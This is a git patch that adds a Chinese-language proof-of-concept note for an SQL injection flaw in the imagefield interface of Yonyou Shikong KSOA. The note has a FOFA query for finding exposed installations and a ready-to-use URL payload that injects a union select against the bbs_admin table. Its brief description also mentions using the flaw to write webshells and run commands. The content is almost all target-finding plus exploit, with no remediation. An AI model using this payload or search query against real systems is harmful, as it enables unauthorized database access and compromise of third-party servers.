From de4f5803573b1d428f405584c5b2c5b0b63a7a3d Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Sun, 24 Mar 2024 21:29:25 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E7=94=A8=E5=8F=8B=E6=97=B6=E7=A9=BAKS?= =?UTF-8?q?OA-imagefield=E6=8E=A5=E5=8F=A3=E5=AD=98=E5=9C=A8SQL=E6=B3=A8?= =?UTF-8?q?=E5=85=A5=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 用友时空KSOA-imagefield接口存在SQL注入漏洞.md | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) create mode 100644 用友时空KSOA-imagefield接口存在SQL注入漏洞.md diff --git a/用友时空KSOA-imagefield接口存在SQL注入漏洞.md b/用友时空KSOA-imagefield接口存在SQL注入漏洞.md new file mode 100644 index 0000000..3b63059 --- /dev/null +++ b/用友时空KSOA-imagefield接口存在SQL注入漏洞.md @@ -0,0 +1,16 @@ +## 用友时空KSOA-imagefield接口存在SQL注入漏洞 + +用友时空KSOA imagefield接口存在SQL注入漏洞,黑客可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。 + +## fofa +``` +app="用友-时空KSOA" +``` + +## poc +``` +/servlet/imagefield?key=readimage&sImgname=password&sTablename=bbs_admin&sKeyname=id&sKeyvalue=-1%27+union+select+sys.fn_varbintohexstr(hashbytes(%27md5%27,%271%27))--+ + +``` + +![c6b2b6d4ba7df38952d185d684c2e60a](https://github.com/wy876/POC/assets/139549762/ba1e8364-d789-480b-bbbb-e9ab0e067950)